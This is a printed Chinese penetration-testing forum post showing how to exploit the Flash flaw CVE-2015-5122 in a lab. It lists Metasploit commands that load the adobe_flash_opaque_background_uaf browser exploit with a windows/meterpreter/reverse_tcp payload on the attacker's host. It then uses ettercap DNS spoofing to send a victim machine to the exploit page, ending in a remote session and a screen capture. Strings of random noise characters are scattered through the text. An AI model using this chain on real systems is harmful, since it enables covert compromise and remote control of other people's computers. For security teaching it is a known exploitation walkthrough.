中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

' Y8 ^( d* F+ p( } 二、cve2015-5122漏洞实例演示虚拟机 / A0 I5 Y5 ]* p3 b3 V% C) G

/ Z6 S e+ y! p5 v1 [- [# j1 x

& r: t* M6 F8 G   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ) {# }2 y5 c" e) a

2 S) v: a. |3 P5 B. B& y

) s. j9 `7 f3 Y" R/ j search cve-2015-5122如图: & G3 ^; Y/ X. R: z- R) P

( s- x; G* [2 L P0 i+ _& G

( u+ S% F. ^2 m& b   ' [" P; k2 E4 T8 C0 y3 C

* S; B9 e! @5 h! t

" ^0 I7 ^3 W" R, A& q! E 下面我们敲如下命令: ) L, }6 I; Q4 Z7 g; h

1 c8 C/ A9 W7 k; K/ q. |

# |5 t( M P3 s$ G& P use exploit/multi/browser/adobe_flash_opaque_background_uaf $ V$ q( U6 u6 F

- T0 s) U# I. o( c3 L$ W

+ f" B" T# Q/ P, L+ \; Z7 A set PAYLOAD windows/meterpreter/reverse_tcp * ^# X2 Z- [( C

- O8 u, o' i! l0 L

, |4 q" j% l" ?) T set LHOST 192.168.0.109 * w2 `5 P5 _$ w" @) Q/ Y

/ F/ K+ k% G* o0 v2 C

1 y* k/ f* c" P, A set URIPATH /                        /*根目录*/ 2 x( k7 \5 ]8 U0 ]8 o6 I( a

: {1 L7 ^# y' y) m* w' E( d

$ `, E% k4 `6 ^ set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 ; e9 c) Z$ A# C! u5 g6 E3 `- s/ g1 | P- L

) U0 a7 `; O1 ^

- P) `' P% S: F+ t( V1 d, ? set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 3 j n0 b. j4 s ?& I4 I/ ]0 D/ g

& c4 e- w+ x' q3 N( v8 r. g

8 t* [ K% k% J9 A" K( H5 ?4 g 然后show options如图: }5 p4 a: g- p8 |# \5 Z$ T" W

0 `0 M' B$ ]8 g6 d

7 U$ H7 ?; F- v. k" I$ ^0 D9 H   5 n# i, l! q# N" M& A& f

: D4 Y2 W- u( j

8 @7 z9 \; r% Y8 U 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
! n( s7 [. g7 F. F
% l, e$ J5 v( R: O

% Y) |. x9 P+ `

9 N8 `( o# U, V' D; M9 } 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 3 I4 c" T, K1 @

; k) G' q( z( [5 U

|' x8 m1 E; m$ b0 ^ Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf , p* ~8 j- K, U8 z$ _

& N& U- f6 O% m7 `

/ t7 k$ G7 [$ G0 X6 \   & Y" ]" B6 _/ r" I1 h0 J: X

3 v8 G$ W- _+ t5 t

1 k- F" t" d* _* C' i 成功了,这时候我们断开ettercap,如图: E: q3 S9 R( |0 j9 a n& n# X3 z

$ ]5 L0 C k! `1 ~; S" q2 o

, W# `, @/ `& b3 S' u9 C   " J- Q4 A8 R" U0 l& {4 I

/ b$ z p' s! B! J, I* z$ a

8 |2 e' g0 Q' a @6 k4 v0 E1 m) ` Screenshot如图: ' h6 l- J! I d D* o5 H* `

+ ^3 E/ U+ E% h7 I/ F0 k! f

, |# N2 Y2 A. M( P! a8 ^) d   " W `7 L: Q' G4 o

( x) g1 F! ?9 u3 w' F9 L2 ~

' F8 ?" v: m- n( ~ * |: A. q( n8 L! ]; c. @8 ~






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2